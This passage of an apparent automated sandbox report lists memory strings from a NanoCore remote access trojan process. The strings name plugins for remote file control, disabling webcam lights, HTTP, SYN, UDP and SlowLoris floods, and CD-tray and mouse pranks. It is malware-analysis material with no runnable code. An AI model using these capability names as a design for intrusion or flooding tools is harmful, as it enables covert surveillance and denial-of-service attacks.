irectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: tchnhwrvi.exe, 00000002.00000003.317149940.0000000006A39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: tchnhwrvi.exe, 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Source: tchnhwrvi.exe, 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.00000000043A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntrie